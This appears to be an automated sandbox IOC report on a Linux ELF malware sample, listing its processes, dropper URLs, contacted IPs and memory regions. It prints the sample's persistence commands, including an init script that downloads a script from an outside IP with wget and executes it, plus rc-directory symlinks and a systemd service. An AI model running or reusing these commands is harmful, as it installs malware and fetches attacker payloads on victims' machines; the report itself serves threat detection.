Automated Malware Analysis IOC Report for

Files

File Path

Type

Processes

Path

Cmdline

Malicious

/tmp/m68k.nn.elf

/bin/sh

sh -c "systemctl enable custom.service >/dev/null 2>&1"

/bin/sh

/usr/bin/systemctl

systemctl enable custom.service

/tmp/m68k.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/system

/tmp/m68k.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/system /etc/rcS.d/S99system

/tmp/m68k.nn.elf

/bin/sh

sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"

/tmp/m68k.nn.elf

/bin/sh

sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/chmod

chmod +x /etc/init.d/m68k.nn.elf

/tmp/m68k.nn.elf

/bin/sh

sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

/bin/sh

/usr/bin/mkdir

mkdir -p /etc/rc.d

/tmp/m68k.nn.elf

/bin/sh

sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"

/bin/sh

/usr/bin/ln

ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf

/tmp/m68k.nn.elf

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/systemd/systemd

/usr/lib/systemd/system-environment-generators/snapd-env-generator

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping

/usr/libexec/gsd-housekeeping

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/sbin/gdm3

/etc/gdm3/PrimeOff/Default

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/dm-0

There are 38 hidden processes, click here to show them.

URLs

Name

Malicious

http://193.143.1.70/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sbi

unknown

http://193.143.1.70/curl.sh

unknown

Details

Name:	http://193.143.1.70/curl.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/m68k.nn.elf
Source:	m68k.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/lol.sh

unknown

Details

Name:	http://193.143.1.70/lol.sh
TargetID:	12
From Memory:	true
Current Path:	/tmp/m68k.nn.elf
Source:	m68k.nn.elf
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

http://193.143.1.70/

unknown

Details

Name:	http://193.143.1.70/
TargetID:	-1
From Memory:	true
Source:	m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, m68k.nn.elf.42.dr, bootcmd.12.dr, custom.service.12.dr
Reputation:	high

Signature Hits	Behavior Group	Mitre Attack
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Found strings indicative of a multi-platform dropper	Spreading	Scripting
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable	System Summary
URLs found in memory or binary data	Networking

IPs

Domain

Country

Malicious

154.216.19.139

unknown

Seychelles

Details

IP:	154.216.19.139
TargetID:	-1
Country:	Seychelles
Countrycode:	SYC
ASN number:	135357
ASN name:	SKHT-ASShenzhenKatherineHengTechnologyInformationCo
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7f994801e000

page execute read

7f994801e000

page execute read

7f99ce7f1000

page read and write

7ffd84483000

page read and write

7f99ce17b000

page read and write

55b200b08000

page execute and read and write

55b200b9f000

page read and write

55b1fe8d0000

page execute read

7f99ceb3c000

page read and write

7f99cd96a000

page read and write

55b1feb0a000

page read and write

7f99cec65000

page read and write

7f99ce40a000

page read and write

55b200e52000

page read and write

7f99ce16d000

page read and write

7f99ce7cc000

page read and write

55b200e52000

page read and write

55b1feb02000

page read and write

55b1fe8d0000

page execute read

7ffd845d6000

page execute read

7f99ce7f1000

page read and write

7f9948024000

page read and write

7f99cec65000

page read and write

7f99ceb3c000

page read and write

7f99c8021000

page read and write

7f99cec6d000

page read and write

7f99ce17b000

page read and write

7f9948020000

page read and write

55b1feb02000

page read and write

7f99cec6d000

page read and write

7ffd84483000

page read and write

7f99cd96a000

page read and write

7f99c8000000

page read and write

7f99cecb2000

page read and write

7f9948020000

page read and write

7f99ce7cc000

page read and write

7f9948029000

page read and write

7ffd845d6000

page execute read

7f99c8000000

page read and write

55b200b08000

page execute and read and write

55b1feb0a000

page read and write

7f99ce40a000

page read and write

7f99cecb2000

page read and write

7f99ce16d000

page read and write

55b200b9f000

page read and write

7f99c8021000

page read and write

7f9948024000

page read and write

There are 37 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
m68k.nn.elf

Files

Processes

URLs

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportm68k.nn.elf

Files

Processes

URLs

IPs

Memdumps

IOC Report
m68k.nn.elf